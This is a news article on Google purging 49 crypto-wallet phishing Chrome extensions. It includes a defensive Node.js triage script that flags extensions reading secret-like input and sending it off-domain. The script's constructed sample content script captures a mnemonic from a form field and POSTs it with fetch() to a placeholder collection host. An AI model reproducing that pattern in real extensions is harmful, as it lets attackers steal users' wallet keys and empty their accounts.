Google has ousted 49 Chrome extensions from its Chrome Web Store because they contained malicious code, a ritual that should be familiar after a decade of purges.
"Essentially, the extensions are phishing for secrets – mnemonic phrases, private keys, and keystore files," explained Harry Denley, director of security at MyCrypto, on Tuesday in a blog post. "Once the user has entered them, the extension sends an HTTP POST request to its backend, where the bad actors receive the secrets and empty the accounts."
Denley said the extension set – which took aim at users of Ledger, Trezor, Jaxx, Electrum, MyEtherWallet, MetaMask, Exodus, and KeepKey – was associated with 14 command-and-control servers believed to be linked to the same person or group, possibly in Russia.
A video of the MEW CW (MyEtherWallet) extension shows how it watches for secrets typed into the wallet page and sends them out over the network to the extension's author.
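Neither the blog post nor this article reproduces the extensions' code, but the behaviour described (a content script injected into a wallet site that captures a mnemonic or key from a form field and POSTs it to a server the extension author controls) is cheap to triage statically from an unpacked extension. The Node.js script below is an added example written for this page, not code from MyCrypto, PhishFort or Google: the manifest and content script it scans are constructed to mimic the described behaviour, the wallet-domain list and the `api.example.invalid` destination are assumptions, and the regexes are deliberately coarse heuristics rather than a parser.

```javascript
// Static triage of an unpacked Chrome extension (Manifest v2, the format in use
// when these extensions shipped). Added example; not the real extensions' code.

// Assumed list of wallet sites worth watching; extend as needed.
const WALLET_DOMAINS = [
  "myetherwallet.com", "metamask.io", "ledger.com", "trezor.io",
  "electrum.org", "exodus.com", "jaxx.io", "keepkey.com",
];

// Secret-like words only matter next to input handling, so both must match.
const SECRET_WORDS = /\b(mnemonic|seed ?phrase|private ?key|keystore)\b/i;
const INPUT_HOOKS = /addEventListener\s*\(\s*["'](input|keyup|keydown|change|submit)["']|\.value\b|new FormData/;
const NET_CALLS = /\bfetch\s*\(|XMLHttpRequest|navigator\.sendBeacon|\$\.(ajax|post)\s*\(/;
// Absolute http(s) URLs written as string literals (misses URLs built at runtime).
const URL_LITERALS = /["'`](https?:\/\/[^"'`\s]+)["'`]/g;

// Crude registrable domain: last two labels. Fine for .com/.io, wrong for .co.uk.
function baseDomain(host) {
  return host.toLowerCase().replace(/^\*\./, "").split(".").slice(-2).join(".");
}

// "*://*.myetherwallet.com/*" -> "myetherwallet.com"; "<all_urls>" or "*://*/*" -> "*"
function hostFromMatchPattern(pattern) {
  if (pattern === "<all_urls>") return "*";
  const m = pattern.match(/^[a-z*]+:\/\/([^/]+)\//i);
  if (!m) return null;
  return m[1] === "*" ? "*" : baseDomain(m[1]);
}

// manifest: parsed manifest.json; scripts: { filename: source text }
function triageExtension(manifest, scripts) {
  const findings = [];
  const targeted = new Set();

  for (const cs of manifest.content_scripts || []) {
    for (const p of cs.matches || []) {
      const h = hostFromMatchPattern(p);
      if (h === "*") {
        findings.push(`content script injected into every site (${p})`);
      } else if (h && WALLET_DOMAINS.includes(h)) {
        targeted.add(h);
        findings.push(`content script targets wallet site ${h} (${p})`);
      }
    }
  }

  for (const [name, src] of Object.entries(scripts)) {
    const reads = SECRET_WORDS.test(src) && INPUT_HOOKS.test(src);
    const sends = NET_CALLS.test(src);
    if (reads && sends) findings.push(`${name}: reads secret-like input and makes network calls`);
    for (const m of src.matchAll(URL_LITERALS)) {
      let host;
      try { host = new URL(m[1]).hostname; } catch { continue; }
      if (!WALLET_DOMAINS.includes(baseDomain(host))) {
        findings.push(`${name}: network destination outside wallet domains: ${host}`);
      }
    }
  }

  const exfil = findings.some(f => f.includes("outside wallet domains"));
  const verdict = targeted.size > 0 && exfil ? "likely-malicious"
                : findings.length ? "review" : "clean";
  return { verdict, targeted: [...targeted], findings };
}

// Constructed sample modelled on the behaviour described in the article.
const SAMPLE_MANIFEST = {
  manifest_version: 2,
  name: "Wallet Helper (constructed sample)",
  version: "1.0",
  permissions: ["storage", "*://*.myetherwallet.com/*"],
  content_scripts: [{ matches: ["*://*.myetherwallet.com/*"], js: ["content.js"] }],
};
const SAMPLE_SCRIPTS = {
  "content.js": `
    const box = document.querySelector('textarea');
    box.addEventListener('input', () => {
      const mnemonic = box.value;
      fetch('https://api.example.invalid/collect', { method: 'POST', body: mnemonic });
    });
  `,
};

console.log(JSON.stringify(triageExtension(SAMPLE_MANIFEST, SAMPLE_SCRIPTS), null, 2));
```

On the constructed sample this reports `likely-malicious` with three findings: the content script is scoped to myetherwallet.com, it both reads secret-like input and makes network calls, and its only destination is outside the wallet's own domain. The literal-URL check is the weak link: an author who assembles the C2 URL at runtime or obfuscates the script defeats it, which is why the input-hook/network-call co-occurrence check is kept separate and why a dynamic check (watching the extension's outbound requests from a throwaway profile, as Denley's video does) is still needed before calling anything clean.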
According to Denley, a few of the command-and-control servers were older, but 80 per cent of them use domains registered in March or April. The extensions themselves began to show up in February, with most arriving over the following two months.
Some of the extensions, he said, were supported by fake five-star reviews; some internet good samaritans also tried to warn others that the extensions were malicious. Google did not immediately respond to a request for comment but the 49 extensions identified by MyCrypto and PhishFort are no longer available in the Chrome Web Store.
About two million people currently use extensions from the Chrome Web Store, according to a report earlier this month from Extension Monitor. Last month, the store had 213,054 extensions, up 3,468 from February.
In February, Google confirmed a significant Chrome extension purge, amounting to about 500 extensions. In January, Google briefly halted the publication of any new extensions because of a fraud surge.
Chrome extension security has been an issue since before the Chrome Web Store launched in December 2010. Recall our report on a Chrome extension trojan from April 2010.
Google's most recent effort involves retooling its extension APIs to make them less powerful, a project dubbed Manifest v3. This should limit abuse but it's also likely to hinder legitimate developers trying to implement content blocking and privacy features that rely on intercepting and rewriting network traffic. It would not have stopped this batch, though: a content script that reads a form field and calls fetch() needs none of the APIs Manifest v3 curtails. ®